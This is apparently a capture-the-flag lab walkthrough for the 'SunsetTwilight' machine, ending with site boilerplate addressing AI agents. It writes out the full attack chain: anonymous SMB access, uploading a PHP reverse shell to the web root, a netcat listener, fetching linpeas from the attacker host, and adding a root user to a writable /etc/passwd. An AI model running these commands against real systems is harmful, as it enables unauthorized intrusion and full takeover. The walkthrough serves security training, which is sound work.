# SunsetTwilight ## Nmap ``` sudo nmap 192.168.120.91 -p- -sS -sV PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 25/tcp open smtp Exim smtpd 80/tcp open http Apache httpd 2.4.38 ((Debian)) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 2121/tcp open ftp pyftpdlib 1.5.6 3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1 8080/tcp open http PHP cli server 5.5 or later 63525/tcp open http PHP cli server 5.5 or later Service Info: Host: TWILIGHT; OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` First up is checking SMB. We are able to connect and list shared without providing credentials as shown below: ``` smbclient -U '' -L \\\\192.168.120.91\\ ``` ![](/files/-MXH_-nS-S5g8LFM18wx) We can then move into the WRKSHARE directory to view the contents: ``` smbclient -U '' \\\\192.168.120.91\\WRKSHARE\\ ``` ![](/files/-MXH_9QMnmfvy0zLeaDP) As this looks like we can see the entire directory from '/' we can have a look about for interesting information. We know that port 80 is open so likely we are running a webserver. Looking at the contents of the directory /var/www/html/ we can see PHP files. ![](/files/-MXHaYo5E6fxZfcQmz5m) If we can upload a reverse PHP shell we should in theory be able to get shell access. I used the following command to upload a [PHP reverse shell](https://github.com/pentestmonkey/php-reverse-shell) with curl into the /var/www/html directory: ``` curl --upload-file /home/kali/scripts/phpshell.php -u '' smb://192.168.120.91/WRKSHARE/var/www/html/phpshell.php ``` ![](/files/-MXHarvm5uOAH6ey1wTS) Checking the directory contents with `smbclient` again shows we have uploaded our PHP reverse shell. ![](/files/-MXHb1EcpdRDBtSc64h1) We can then set a `netcat` listener up then execute the shell with `curl`. ``` sudo nc -lvp 80 curl http://192.168.120.91/phpshell.php ``` ![](/files/-MXHbXZaJ1Mh5XynWqh3) The current shell can then be improved by: ``` python -c 'import pty; pty.spawn("/bin/bash")' ``` ![](/files/-MXHbhcmHiVdljtXFq4t) Next we can move into the /tmp/ directory. Started a `Python SimpleHTTPServer` on my attacking machine and transferred over `linpeas`. ``` wget http://192.168.49.120/linpeas.sh ``` `linpeas` picks up that /etc/passwd is writeable by everyone. Which means we can make changes to the file. ![](/files/-MXHckNG5MMw4BrozrCc) As such we can add a new root user to the target machine to gain root access. Generate password on attacking machine: ``` openssl passwd -1 -salt password password ``` Echo the password and new user to the end of /etc/passwd on the target machine. ``` echo 'owned:$1$password$Da2mWXlxe6J7jtww12SNG/:0:0:owned:/root:/bin/bash' >> /etc/passwd ``` We can then use `su` to move into the new account and gain a root shell. ![](/files/-MXHd95LxAotOgP9xHf2) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/sunsettwilight.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.